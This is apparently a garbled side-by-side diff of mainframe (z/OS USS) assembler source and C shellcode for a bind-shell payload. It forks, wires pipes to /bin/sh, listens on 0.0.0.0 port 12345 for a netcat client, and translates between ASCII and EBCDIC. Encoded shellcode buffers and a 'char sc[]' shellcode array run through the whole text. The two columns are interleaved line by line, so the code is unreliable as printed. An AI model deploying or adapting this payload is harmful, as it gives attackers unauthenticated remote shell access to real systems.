L 6,CPROCN # locad Ret val in R6 *******************************************************************
CIB 6,-1,8,EXITP # compare R6 to -1 and jump if eq *Number of bytes: 2088
*Padding bytes: 0
**************************************************** *Enc buffer char: 0x4b
* prepare the child process for exec , only runs * *ASM buffer:
* if CPROCN (child pid from fork) equals 0 * DC X'dba79b478bbbb4b4b4b553448b0b4b4b48af1b9b0b4f539fecd34bX
**************************************************** 4aec834b4fecae48708f144b4b48bd8f244b4b48beecae48788f144bX
@PREPCHL L 2,CPROCN # load child proc # to R2 4b48b98f244b4b48ba8fb64b4b489f8b5b4b4b4b5a533a1b3c4b4b51X
CIB 2,0,7,@PREPPAR # R2 not 0? We are parent, move on 371b3b3b4b5137ee31cb4b1b3b3b4becbf4b424b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4ea48f66b4b4b4b2a76c4b'
************************************************* DC X'fa4b350a6b4b428f164b4b4880532eecae49fe8f164b4b48f4532eX
* order of things to prep child pid * ecae49e40a6b4b438f164b4b48f08b2a4b4b4b4becae49ee8f164b4bX
* 0) Close parent write fd * 48fa8b2a4b4b4b4aecae49d68f164b4b48e28b2a4b4b4b49ecae49deX
* 1) Close child read fd * 0a6b4b428f164b4b48ea532eecae49c68f164b4b48d2532eecae49ccX
* 2) dupe parent read fd to std input * 8fb64b4b48348b5b4b4b4b138b3b4b4b'
* 3) dupe child write fd to std output * DC X'4b0e8f344b4b4b1951378f344b4b4b1b8b3b4b4b4b0a8f344b4b4bX
* 4) dupe child write fd to std err * 0751378f344b4b4b7551378f344b4b4b0d51378f344b4b4b7151378fX
* 5) Close parent read fd * 344b4b4b0b8b3b4b4b481a8f344b4b4b778f344b4b4b708f344b4b4bX
* 6) Close child write fd * 718f344b4b4b728f344b4b4b738b3b4b4b4b7c8f344b4b4b7f51378fX
* 7) exec /bin/sh * 344b4b4b795137ee31cb4b8f344b4b4b'
************************************************* DC X'65ec4e4b664b4b4b4b4b4c2ac9c2de2ae9c34b4b4b4b4a4b4b4b49X
LARL 14,@PRC1 4b4b4b4be9c34b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4bX
LA 2,F_CLOSFD 4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4bX
L 5,PFDW # load R5 with pfdw 4b4b4b4b4b4b4b4b4ea4ec4e49a78bab4b4b4b400a6b4b428f164b4bX
L 6,PFDW # load R5 with pfdw 4853532eecbf494feca14b5b8f164b4b'
@PRC0 BRC 15,LFCNTL # call close DC X'4845532eecbf4ab78fb64b4b49bd8b5b4b4b4b7e8b3b4b4b49a18fX
@PRC1 LARL 14,@PRC2 344b4b4b648b3b4b4b49a98f344b4b4b608b3b4b4b49918f344b4b4bX
LA 2,F_CLOSFD 6c8b3b4b4b499d8f344b4b4b688b3b4b4b4b538f344b4b4b548b3b4bX
L 5,CFDR # load R5 with cfdr 4b4b558f344b4b4b5051378f344b4b4b525137ee31cb4b8f344b4b4bX
L 6,CFDR # load R5 with cfdr 5eec4e4b5f4b4b4b4b4b4b4b4b4b4b4b'
BRC 15,LFCNTL # call close DC X'4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4ea4X
@PRC2 LARL 14,@PRC3 8fb64b4b49e48b5b4b4b4b618b3bb4b4b4ac8f344b4b4b6f8b3b4b4bX
LA 2,F_DUPFD2 # gonna do a dup2 4b548f344b4b4b6b8b3b4b4b49f88f344b4b4b578b3b4b4b4b508f34X
L 5,PFDR # parent read fd 4b4b4b5351378f344b4b4b5d5137ee31cb4b8f344b4b4b59ec4e4b5aX
LGFI 6,0 # std input 4b4b4b4b4b5b4b4b4b4b4b4b4b4b4b4b'
BRC 15,LFCNTL # call dupe2 DC X'4b4b4b4b4b4b4b4b4b4b4b4b4b4b4ea453b78f26b4b4b4b3a72c49X
@PRC3 LARL 14,@PRC4 1a4b358fb64b4b493b8b5b4b4b4b6a8b3bb4b4b4ed8f344b4b4b508bX
LA 2,F_DUPFD2 # gonna do a dup2 3b4b4b49138f344b4b4b5c8b3b4b4b4b5d8f344b4b4b5851378f344bX
L 5,CFDW # child write fd 4b4b5a5137ee31cb4b8f344b4b4b46ec4e4b474b4b4b4b4b4b4b4b4bX
LGFI 6,1 # std output 4b4b4b4b4b4b4b4b4b4b4b4ea48fb64b'
BRC 15,LFCNTL # call dupe2 DC X'4b49088b5b4b4b4b7d8b3bb4b4b43c8f344b4b4b7b8b3b4b4b4b62X
@PRC4 LARL 14,@PRC5 # if 0 we are in child pid, goto exec 8f344b4b4b678b3b4b4b4b508f344b4b4b638b3b4b4b4b548f344b4bX
LA 2,F_DUPFD2 # gonna do a dup2 4b6f8b3b4b4b4b688f344b4b4b6b5137ee31cb4b8f344b4b4b57ec4eX
L 5,CFDW # child write fd 4b504b4b4b4b4b4b4b4b4b4b5b494b4b4b4b4b4b4b4b4b4b4b4b4b4bX
LGFI 6,2 # std error 4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b'
BRC 15,LFCNTL # call dupe2 DC X'4b4b4b4b4b4b4b4b4ea48bab4b4b4b470a6b4b4f8f16b4b4b4a7ecX
@PRC5 LARL 14,@PRC6 234b4cecbf4bbaeca14b598f164b4b4ab2ec234b4decbf4ba38b1bb4X
LA 2,F_CLOSFD b4b4978b3b4b4b4b47ecae4b50ecae4a228b1b4b4b4aa5ecae4bc38bX
L 5,PFDR # load R5 with pfdr 1b4b4b4aa88b3bb4b4b4a5ecae4b47ecae4ace8babb4b4b4bd8b1bb4X
L 6,PFDR # load R5 with pfdr b4b48becbf4b3d8fb64b4b4a82537c8f'
BRC 15,LFCNTL # call close DC X'a44b4b4ae48b6b4b4b4b079c4c6b4b6b4b8b6b4b4b4b759c446b4bX
@PRC6 LARL 14,@PRC7 6b4b8f144b4b4b098b5b4b4b4b748b3b4b4b4b798f344b4b4b608b3bX
LA 2,F_CLOSFD 4b4b4b638f344b4b4b7e8b3b4b4b4ad98f344b4b4b7a8b3b4b4b4b55X
L 5,CFDW # load R5 with cfdw 8f344b4b4b668b3b4b4b4b698f344b4b4b628b3b4b4b4b638f344b4bX
L 6,CFDW # load R5 with cfdw 4b6e5137ee31cb4b8f344b4b4b6aec4e'
BRC 15,LFCNTL # call close DC X'4b6b4b4b4b4b4b4b4b4b4b4b4b4a69696969696969696969696969X
@PRC7 BRAS 0,LEXEC 6969694b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4ea48fa64b4b4a04533853b28f26b4b4b4a1a729abX
*********************************************************************** 4b4bb5a7233b4bb4b5ec4e4a7a8fb64b4b4a1c8fa44b4b4a778b5b4bX
* * 4b4b7a8b3bb4b4b4858f344b4b4b628b'
* BP1EXC (EXEC) execute shell '/bin/sh' * DC X'3b4b4b4b6d8f344b4b4b6c8f144b4b4b698b3b4b4b4a608f344b4bX
* * 4b6b8b3bb4b4b48a8f344b4b4b5751378f344b4b4b5151378f344b4bX
*********************************************************************** 4b535137ee31cb4b8f344b4b4b5fec4e4b584b4b4b4b4b4b4b4b4b4bX
LEXEC L 15,BEXC # load func addr to 15 4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4ea48fa6X
CALL (15),(EXCMDL,EXCMD,EXARGC,EXARGLL,EXARGL, x 4b4b4bb28f26b4b4b4bd53bda7234ba9'
EXENVC,EXENVLL,EXENVL, x DC X'b4354cb58fb64b4b4a438fa44b4b4ba08b5b4b4b4b79533a503750X
EXITRA,EXITPLA, x 3750378f144b4b4b6e8f344b4b4b638f644b4b4b6a51378f344b4b4bX
RTN_VAL,RTN_COD,RSN_COD),VL 688f244b4b4b5751378f344b4b4b5551378f344b4b4b5751378f344bX
BRAS 0,GOODEX # exit child proc after exec 4b4b515137ee31cb4b8f344b4b4b5dec4e4b5e4b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b'
**************************************************** DC X'4b4b4b4b4b4b4b4b4b4b4b4b4b4ea48fa64b4b4be28f36b4b4b4bdX
* prepare the parent process to speak with child * a7334bd8b4354cb58fb64b4b4bf08fa44b4b4bd78b5b4b4b4b50533aX
* order of things to prep parent pid * 8f344b4b4b5c51378f344b4b4b5e51378f344b4b4b5851378f344b4bX
* 0) close parent fd read * 4b5a5137ee31cb4b8f344b4b4b46ec4e4b474b4b4b4b4b4b4b4b4b4bX
* 1) close child fd write * 4b4b4b4b4b4b4b4b4b4b4ea48f26b4b4'
* 2) socket,bind,accept,listen,read & write * DC X'b4b2a7234b2bb4358f16b4b4b4a48f26b4b4b4a58fa64b4b4b2c4cX
* 3) set client socked and child fd write * b58b5bb4b4b5b08f06b4b4b44b8b6b4b4b4bccecc34b5ea87b5b4b4bX
* to non_blocking * 3d8b704b4b4bb45273ec3f4b4dec234bceecbf4b45a81b6b4b4b3d8bX
**************************************************** 104b4b4bb451625122527eec3fb4bc5022092b5b4b51525002ec3fb4X
@PREPPAR LARL 14,@PRP1 a84cb58f06b4b4b5938b5bb4b4b586ec'
LA 2,F_CLOSFD DC X'c34bce8b6b4b4b4b115062a87b5b4b4b3d8b704b4b4bb45273ec3fX
L 5,PFDR # load R5 with pfdr 4b4dec734b2eecbf4b425168a87b6b4b4b3d8b704b4b4bb4097b5b4bX
L 6,PFDR # load R5 with pfdr 51525002ec3fb4af4cb55cb48b0b4b4b4b5b1bbb0b4b139b0b4fd3a7X
BRC 15,LFCNTL # call close 9b478b0b4b4b4b4c13bb0b4b4cb54b4b4b4b4b4b4b4b4b4b4b4b4b4bX
@PRP1 LARL 14,LSOCK 4b4b4b4a4b4b4b494a1878f74a1878ef'
LA 2,F_CLOSFD DC X'4a187c5b4a187d7d4a187d234a187d6f4a1878554a1878c14a1879X
L 5,CFDW # load R5 with cfdw 074a18784d4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b49497b724b4b4bX
L 6,CFDW # load R5 with cfdw 4b'
BRC 15,LFCNTL # call close
***********************************************************************
* *
* BPX1SOC set up socket - inline *
* *
***********************************************************************
LSOCK L 15,BSOC # load func addr to 15
CALL (15),(DOM,TYPE,PROTO,DIM,SRVFD, x
RTN_VAL,RTN_COD,RSN_COD),VL
*******************************
* chk return code, 0 or exit *
*******************************
LHI 15,2
L 6,RTN_VAL
CIB 6,0,7,EXITP # R6 not 0? Time to exit
***********************************************************************
* *
* BPC1BND (bind) bind to socket - inline *
* *
***********************************************************************
LBIND L 15,BBND # load func addr to 15
LA 5,SRVSKT # addr of our socket
USING SOCKADDR,5 # layout sockaddr over R5
XC SOCKADDR(16),SOCKADDR # zero sock addr struct
MVI SOCK_FAMILY,AF_INET # family inet
MVI SOCK_LEN,SOCK#LEN # len of socket
MVC SOCK_SIN_PORT,LISTSOCK # list on PORT 12345
MVC SOCK_SIN_ADDR,LISTADDR # listen on 0.0.0.0
DROP 5
CALL (15),(SRVFD,SOCKLEN,SRVSKT, x
RTN_VAL,RTN_COD,RSN_COD),VL
*******************************
* chk return code, 0 or exit *
*******************************
LHI 15,3
L 6,RTN_VAL
CIB 6,0,7,EXITP # R6 not 0? Time to exit
***********************************************************************
* *
* BPX1LSN (listen) listen on created socket - inline *
* *
***********************************************************************
LLIST L 15,BLSN # load func addr to 15
CALL (15),(SRVFD,BACKLOG, x
RTN_VAL,RTN_COD,RSN_COD),VL
*******************************
* chk return code, 0 or exit *
*******************************
LHI 15,4
L 6,RTN_VAL
CIB 6,0,7,EXITP # R6 not 0? Time to exit
***********************************************************************
* *
* BPX1ACP (accept) - accept conn from socket - inline *
* *
***********************************************************************
LACPT L 15,BACP # load func addr to 15
LA 5,CLISKT # addr of our socket address
USING SOCKADDR,5 # set up addressing for sock struct
XC SOCKADDR(8),SOCKADDR #zero sock addr struct
MVI SOCK_FAMILY,AF_INET
MVI SOCK_LEN,(SOCK#LEN+SOCK_SIN#LEN)
DROP 5
CALL (15),(SRVFD,CLILEN,CLISKT, x
CLIFD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,5
L 6,CLIFD
CIB 6,-1,8,EXITP # R6 = -1? Time to exit
****************************************************
* Set clifd and child fd read to non_blocking *
****************************************************
@SNB1 LARL 14,@SNB2
LA 2,F_GETFL # get file status flags
L 5,CLIFD # client sock fd
XR 6,6 # for getfd, arg is 0
BRC 15,LFCNTL # call dupe2
@TFLAG DC F'0'
@SNB2 ST 7,@TFLAG # R7 will have our flags
LA 5,O_NONBLOCK # add non-blocking flag
OR 7,5 # or to add the flag to R7
LARL 14,@SNB3
LA 2,F_SETFL # set file status flags
L 5,CLIFD # client sock fd
LR 6,7 # put new flags in R6
BRC 15,LFCNTL # call dupe2
@SNB3 LARL 14,@SNB4
LA 2,F_GETFL # get file status flags
L 5,CFDR # child fd read
XR 6,6 # for getfd, arg is 0
BRC 15,LFCNTL # call dupe2
@SNB4 ST 7,@TFLAG # R7 will have our flags
LA 5,O_NONBLOCK # add non-blocking flag
OR 7,5 # or to add the flag to R7
LARL 14,@READCLI # when we ret, enter main loop
LA 2,F_SETFL # set file status flags
L 5,CFDR # child fd read
LR 6,7 # put new flags in R6
BRC 15,LFCNTL # call dupe2
***********************************************************************
* *
* Main read from client socket looop starts here *
* *
***********************************************************************
@READCLI L 5,CLIFD # read from CLIFD
LA 7,@READCFD # Nothing read, return to here
LARL 14,@A2E1 # Bytes read, return to here
BRC 15,LREAD # Brach to read function
*******************************
* CALL A2E *
* change CLIBUF from *
* ASCII to EBCDIC *
*******************************
@A2E1 LARL 14,@CCW1 # load return area in r14
BRC 15,CONVAE # call e2a func
@CCW1 LARL 14,@READCFD # after write, read child fd
L 5,PFDW # write to child process fd
BRC 15,LWRITE # call write function
***********************************************************************
* *
* Read from child fd loop starts here *
* *
***********************************************************************
@READCFD L 5,CFDR # read from child fd
LA 7,@READCLI # nothing read, back to socket read
LARL 14,@E2A1 # Bytes read, return to here
BRC 15,LREAD # Branch to read function
*******************************
* CALL E2A *
* change CLIBUF from *
* EBCIDIC to ASCII *
*******************************
@E2A1 LARL 14,@CCW2 # load return area in r14
BRC 15,CONVEA # call e2a func
@CCW2 LARL 14,@READCFD # loop read child proc fd after write
L 5,CLIFD # write to client socked fd
BRC 15,LWRITE # call write function
********************************************************
* Functions beyond this point, no more inline *
* execution beyond here should occur *
********************************************************
***********************************************************************
* *
* BPX1RED (read) - function *
* R5 has file descriptor to read from *
* R7 has nothing read address *
* R14 has good read return address *
* *
***********************************************************************
LREAD L 15,BRED # load func addr to 15
ST 5,@TRFD # file descriptor we are reading
ST 7,@NRA # no bytes read: return address
ST 14,SAVEAREA # bytes read: return address
XR 1,1 # clear R1
ST 1,BREAD # clear Bytes Read
L 5,CLIBUF # clibuf addr
XC 0(52,5),0(5) # 0 out cli buf
BRAS 0,@CRED # jump to call
@TRFD DC 4XL1'0' # temp var for rd to read
@NRA DC 4XL1'0' # temp var for not read ret addr
@CRED CALL (15),(@TRFD,CLIBUF,ALET,CLIREAD, x
BREAD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
* for non-blocking fd's we have to check *
* both the return val and code to make sure *
* it didn't fail just b/c non-blocking and no *
* data available vs just a read error *
****************************************************
L 14,SAVEAREA # bytes read RA
L 7,@NRA # no bytes read RA
LHI 15,6 # exit code for this function
L 6,BREAD # bytes read (aka rtn val)
CIB 6,0,2,0(14) # bytes read, process them
CIB 6,0,8,0(7) # OK rtn code, on to nobyte read
L 6,RTN_COD # load up return code
LA 1,EWOULDBLOCK # load up the non-blocking RTNCOD
LA 2,EAGAIN # load up the other OK nblck RTNCOD
CRB 6,1,8,0(7) # OK rtn code, on to nobyte read
CRB 6,2,8,0(7) # OK rtn code, on to nobyte read
BRAS 0,EXITP # -1 and not due to blocking, exit
***********************************************************************
* *
* BPX1WRT (WRITE) - function *
* R5 has file descriptor to read from *
* *
***********************************************************************
LWRITE L 15,BWRT # load func addr to 15
ST 5,@TWFD # store fd in temp fd
ST 14,SAVEAREA # save return address
BRAS 0,@CWRT # jump to write
@TWFD DC A(*) # temp holder for fd
@CWRT CALL (15),(@TWFD,CLIBUF,ALET,BREAD, x
BWRIT,RTN_COD,RSN_COD),VL
**************************************************************
* chk return code here anything but neg 1 is ok *
* exit if a match (8) *
**************************************************************
L 14,SAVEAREA # restore return address
LHI 15,9 # exit code for this func
L 6,BWRIT # set r6 to rtn val
CIB 6,-1,8,EXITP # exit if R6 = -1
BCR 15,14 # back to return address
***********************************************************************
* *
* BPX1FCT (fcntl) edit file descriptor *
* for dup2 set R2=F_DUPFD2 *
* R5=fd to modify R6=fd to set R5 equal to *
* equivalent to dupe2(R5,R6) *
* for read flags, set R2=F_GETFL *
* R5=fd, R6=0, R7=rtn flags *
* for write flags, set R2=F_SETFL *
* R5=fd, R6=<new flags> R7=0 *
* for close, set R2=F_CLOSFD *
* R5=R6 = fd to close (optionally R5 & R6 can be a range *
* of FDs to close) *
* *
***********************************************************************
LFCNTL L 15,BFCT # load func addr to 15
ST 14,SAVEAREA # save return address
ST 5,@FFD # fd to be duplicated
ST 2,@ACT # action field for BPX1FCT
ST 6,@ARG # r6 should have the biggest fd
BRAS 0,@FCTL
@FFD DC F'0'
@ACT DC F'0'
@ARG DC F'0'
@RETFD DC F'0'
@FCTL CALL (15),(@FFD,@ACT,@ARG,@RETFD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,11 # exit code for this func
L 7,@RETFD # set r6 to rtn val
CIB 7,-1,8,EXITP # r6 = -1 exit
L 14,SAVEAREA # reload ret address
BCR 15,14 # return to caller
***********************************************************************
* *
* BPX1PIP (pipe) create pipe - no input *
* returns: R5=read fd R6=write fd *
* *
***********************************************************************
LPIPE L 15,BPIP # load func addr to 15
ST 14,SAVEAREA # save return address
BRAS 0,@PIP
@RFD DC F'0' # read file desc
@WFD DC F'0' # write file desc
@PIP CALL (15),(@RFD,@WFD,RTN_VAL,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,12 # exit code for this func
L 6,BWRIT # set r6 to rtn val
CIB 6,-1,8,EXITP
L 5,@RFD # load R5 with read fd
L 6,@WFD # load R6 with write fd
L 14,SAVEAREA # reload ret address
BCR 15,14 # return to caller
***********************************************************************
* *
* CONVAE - convert CLIBUF ascii to ebcidic *
* function looks up ascii byte and returns ebcdic *
* expects return address in R14 *
* *
***********************************************************************
CONVAE LHI 6,1 # R6 has number 1
L 4,BREAD # num of bytes read
L 1,CLIBUF # address of cli sock input
LOOP1 L 2,A2E # address of a2e buff
SR 2,6 # subtract 1 from R2 addr
LB 3,0(0,1) # Load byte from cli into R3
NILF 3,X'FF' # make sure R3 is 1 positive byte
AR 2,3 # add ascii val to a2e buff
LB 3,0(0,2) # load byte from a2e buff into R3
NILF 3,X'FF' # make sure R3 is 1 positive byte
STC 3,0(0,1) # store R3 byte back into cli buff
AR 1,6 # increment client buff
SR 4,6 # sub1 from ctr, loop if non-neg
BRC 7,LOOP1 # looop
BCR 15,14 # return to caller
***********************************************************************
* *
* CONVEA - convert CLIBUF ebcidic to ascii *
* function looks up ebcidic byte and returns ascii *
* expects return address in R14 *
* *
***********************************************************************
CONVEA LHI 6,1 # R6 has number 1
L 4,BREAD # num of bytes read
L 1,CLIBUF # address of cli sock input
LOOP2 L 2,E2A # address of e2a buff
SR 2,6 # subtract 1 from R2 addr
LB 3,0(0,1) # Load byte from cli into R3
NILF 3,X'FF' # make sure R3 is 1 positive byte
AR 2,3 # add ascii val to e2a buff
LB 3,0(0,2) # load byte from e2a buff into R3
STC 3,0(0,1) # store R3 byte back into cli buff
NILF 3,X'FF' # make sure R3 is 1 positive byte
AR 1,6 # increment client buff
SR 4,6 # sub1 from ctr, loop if non-neg
BRC 7,LOOP2 # looop
BCR 15,14 # return to caller
****************************************************
* cleanup & exit *
* preload R15 with exit code *
****************************************************
GOODEX XR 15,15 # zero return code
EXITP ST 15,0(,11)
L 13,4(,11)
LM 14,12,12(13) # restore registers
LARL 5,SAVEAREA
L 15,0(0,5)
BCR 15,14 # branch to caller
**********************
**********************
* *
* Constant Sections *
* *
**********************
**********************
@CONST DS 0F # constants full word boundary
SAVEAREA DC X'00000000'
DC X'00000000'
ALET DC F'0'
O_NONBLOCK EQU X'04' # bit for nonblocking io
EWOULDBLOCK EQU X'44E' # rtncod for nonblk read sock
EAGAIN EQU X'70' # rtncod for nonblk, not thr
*************************
* Function addresses * # pipe variables
*************************
FFUNC DC A(BFRK) # address of first function
NUMFUNC DC F'11' # number of funcs listed below
BFRK DC CL8'BPX1FRK ' # Fork
BEXC DC CL8'BPX1EXC ' # Exec
BSOC DC CL8'BPX1SOC ' # Socket
BBND DC CL8'BPX1BND ' # Bind
BLSN DC CL8'BPX1LSN ' # Listen
BACP DC CL8'BPX1ACP ' # Accept
BRED DC CL8'BPX1RED ' # Read
BWRT DC CL8'BPX1WRT ' # Write
BCLO DC CL8'BPX1CLO ' # Close
BFCT DC CL8'BPX1FCT ' # Fcntl
BPIP DC CL8'BPX1PIP ' # Pipe
*************************
* Socket conn variables * # functions used by pgm
*************************
LISTSOCK DC XL2'3039' # port 12345
LISTADDR DC XL4'00000000' # address 0.0.0.0
BACKLOG DC F'1' # 1 byte backlog
DOM DC A(AF_INET) # AF_INET = 2
TYPE DC A(SOCK#_STREAM) # stream = 1
PROTO DC A(IPPROTO_IP) # ip = 0
DIM DC A(SOCK#DIM_SOCKET) # dim_sock = 1
SRVFD DC A(*) # server FD
SRVSKT DC 16XL1'77' # srv socket struct
SOCKLEN DC A(SOCK#LEN+SOCK_SIN#LEN)
CLILEN DC A(*) # len of client struct
CLISKT DC 16XL1'88' # client socket struct
CLIFD DC A(*) # client fd
************************
* BPX1PIP vars ********* # pipe variables
************************
CFDR DC F'0' # child proc FD read
CFDW DC F'0' # child proc FD write
PFDR DC F'0' # parent proc FD read
PFDW DC F'0' # parent proc FD write
************************
* BPX1FRK vars *********
************************
CPROCN DC F'-1' # child proc #
************************
* BPX1EXC vars *********
************************
EXCMD DC CL7'/bin/sh' # command to exec
EXCMDL DC A(L'EXCMD) # len of cmd to exec
EXARGC DC F'1' # num of arguments
EXARG1 DC CL2'sh' # arg 1 to exec
EXARG1L DC A(L'EXARG1) # len of arg1
EXARGL DC A(EXARG1) # addr of argument list
EXARGLL DC A(EXARG1L) # addr of arg len list
EXENVC DC F'0' # env var count
EXENVL DC F'0' # env var arg list addr
EXENVLL DC F'0' # env var arg len addr
EXITRA DC F'0' # exit routine addr
EXITPLA DC F'0' # exit rout parm list addr
**************************
* Socket read/write vars *
**************************
CLIREAD DC A(L'@CBUF) # one less than buf
CLIBUF DC A(@CBUF) # buff for read cli sock
@CBUF DC 52XL1'22'
BREAD DC F'0' # bytes read
BWRIT DC F'0' # bytes written
*********************
* Return value vars *
*********************
RTN_VAL DC A(*) # return value
RTN_COD DC A(*) # return code
RSN_COD DC A(*) # reason code
***************************
***** end of constants ****
***************************
****************************************************
* ebcidic to ascii lookup *
* read hex(ebcidic char) bytes from beginning of *
* array to get ascii byte *
****************************************************
E2ABUF DC X'0102039c09867f978d8e0b0c0d0e0f101112139d0a08871819928fX E2ABUF DC X'0102039c09867f978d8e0b0c0d0e0f101112139d0a08871819928fX
1c1d1e1f808182838485171b88898a8b8c0506079091169394959604X 1c1d1e1f808182838485171b88898a8b8c0506079091169394959604X
98999a9b14159e1a20a0e2e4e0e1e3e5e7f1a22e3c282b7c26e9eaebX 98999a9b14FF9e1a20a0e2e4e0e1e3e5e7f1a22e3c282b7c26e9eaebX
e8edeeefecdf21242a293b5e2d2fc2c4c0c1c3c5c7d1a62c255f3e3fX e8edeeefecdf21242a293b5e2d2fc2c4c0c1c3c5c7d1a62c255f3e3fX
f8c9cacbc8cdcecfcc603a2340273d22' f8c9cacbc8cdcecfcc603a2340273d22'
DC X'd8616263646566676869abbbf0fdfeb1b06a6b6c6d6e6f707172aaX DC X'd8616263646566676869abbbf0fdfeb1b06a6b6c6d6e6f707172aaX
@ -587,24 +161,170 @@ E2ABUF DC X'0102039c09867f978d8e0b0c0d0e0f101112139d0a08871819928fX
4c4d4e4f505152b9fbfcf9faff5cf7535455565758595ab2d4d6d2d3X 4c4d4e4f505152b9fbfcf9faff5cf7535455565758595ab2d4d6d2d3X
d530313233343536373839b3dbdcd9da' d530313233343536373839b3dbdcd9da'
DC X'9f' DC X'9f'
E2A DC A(E2ABUF) ******************************************************************
**************************************************** DC X'8BADF00D' eof marker
* ascii to ebcidic lookup * END
* read hex(ascii char) bytes from beginning of *
* array to get ebcidic byte * ########################################################################
****************************************************
A2EBUF DC X'010203372d2e2f1605150b0c0d0e0f101112133c3d322618193f27X \* For SystemZ USS *\
1c1d1e1f405a7f7b5b6c507d4d5d5c4e6b604b61f0f1f2f3f4f5f6f7X \* Bind shell payload listens on port 12345 on 0.0.0.0 *\
f8f97a5e4c7e6e6f7cc1c2c3c4c5c6c7c8c9d1d2d3d4d5d6d7d8d9e2X \* Use netcat to connect *\
e3e4e5e6e7e8e9ade0bd5f6d79818283848586878889919293949596X \* Author: Bigendian Smalls *\
979899a2a3a4a5a6a7a8a9c04fd0a107' char sc[]=
DC X'202122232425061728292a2b2c090a1b30311a333435360838393aX "\x90\x64\xd0\x0c\xc0\xf0\xff\xff\xff\xfe\x18\xcf\x17\x11\x17\x22"
3b04143eff41aa4ab19fb26ab5bbb49a8ab0caafbc908feafabea0b6X "\x17\x33\xc2\x19\x01\x01\x01\x02\xc2\x29\x01\x01\x01\x03\x17\x12"
b39dda9b8bb7b8b9ab6465626663679e687471727378757677ac69edX "\x18\x41\x8b\x40\x10\x01\x17\xaa\x17\x22\xc0\xa1\xde\xad\xbe\xef"
eeebefecbf80fdfefbfcbaae594445424643479c4854515253585556X "\x18\xbc\x1a\xb1\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xfc\x1a\xb4"
578c49cdcecbcfcce170dddedbdc8d8e' "\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xf6\x1a\xb1\x1b\xb4\x50\xd0"
DC X'df' "\xb0\x04\x50\xb0\xd0\x08\x18\xdb\x18\x3b\x1a\x34\x1a\x34\x18\x53"
A2E DC A(A2EBUF) "\x1b\x31\x1b\x31\x18\x41\x17\x11\x17\x22\x1a\x14\xb9\xf8\x10\x23"
BPXYSOCK LIST=YES # MACRO MAP for socket structure "\x97\x4b\x20\x01\xa7\x1e\x08\x28\xa7\x44\xff\xf9\x17\x44\x58\xd4"
BPXYFCTL LIST=YES # MACRO MAP for fcntl structure "\xb0\x04\x98\x64\xd0\x0c\x07\xf5\xde\xad\xbe\xef\xde\xad\xbe\xef"
END @SETUP "\xdb\xa7\x9b\x47\x8b\xbb\xb4\xb4\xb4\xb5\x53\x44\x8b\x0b\x4b\x4b"
"\x48\xaf\x1b\x9b\x0b\x4f\x53\x9f\xec\xd3\x4b\x4a\xec\x83\x4b\x4f"
"\xec\xae\x48\x70\x8f\x14\x4b\x4b\x48\xbd\x8f\x24\x4b\x4b\x48\xbe"
"\xec\xae\x48\x78\x8f\x14\x4b\x4b\x48\xb9\x8f\x24\x4b\x4b\x48\xba"
"\x8f\xb6\x4b\x4b\x48\x9f\x8b\x5b\x4b\x4b\x4b\x5a\x53\x3a\x1b\x3c"
"\x4b\x4b\x51\x37\x1b\x3b\x3b\x4b\x51\x37\xee\x31\xcb\x4b\x1b\x3b"
"\x3b\x4b\xec\xbf\x4b\x42\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4e\xa4\x8f\x66\xb4\xb4\xb4\xb2\xa7\x6c\x4b\xfa"
"\x4b\x35\x0a\x6b\x4b\x42\x8f\x16\x4b\x4b\x48\x80\x53\x2e\xec\xae"
"\x49\xfe\x8f\x16\x4b\x4b\x48\xf4\x53\x2e\xec\xae\x49\xe4\x0a\x6b"
"\x4b\x43\x8f\x16\x4b\x4b\x48\xf0\x8b\x2a\x4b\x4b\x4b\x4b\xec\xae"
"\x49\xee\x8f\x16\x4b\x4b\x48\xfa\x8b\x2a\x4b\x4b\x4b\x4a\xec\xae"
"\x49\xd6\x8f\x16\x4b\x4b\x48\xe2\x8b\x2a\x4b\x4b\x4b\x49\xec\xae"
"\x49\xde\x0a\x6b\x4b\x42\x8f\x16\x4b\x4b\x48\xea\x53\x2e\xec\xae"
"\x49\xc6\x8f\x16\x4b\x4b\x48\xd2\x53\x2e\xec\xae\x49\xcc\x8f\xb6"
"\x4b\x4b\x48\x34\x8b\x5b\x4b\x4b\x4b\x13\x8b\x3b\x4b\x4b\x4b\x0e"
"\x8f\x34\x4b\x4b\x4b\x19\x51\x37\x8f\x34\x4b\x4b\x4b\x1b\x8b\x3b"
"\x4b\x4b\x4b\x0a\x8f\x34\x4b\x4b\x4b\x07\x51\x37\x8f\x34\x4b\x4b"
"\x4b\x75\x51\x37\x8f\x34\x4b\x4b\x4b\x0d\x51\x37\x8f\x34\x4b\x4b"
"\x4b\x71\x51\x37\x8f\x34\x4b\x4b\x4b\x0b\x8b\x3b\x4b\x4b\x48\x1a"
"\x8f\x34\x4b\x4b\x4b\x77\x8f\x34\x4b\x4b\x4b\x70\x8f\x34\x4b\x4b"
"\x4b\x71\x8f\x34\x4b\x4b\x4b\x72\x8f\x34\x4b\x4b\x4b\x73\x8b\x3b"
"\x4b\x4b\x4b\x7c\x8f\x34\x4b\x4b\x4b\x7f\x51\x37\x8f\x34\x4b\x4b"
"\x4b\x79\x51\x37\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x65\xec\x4e"
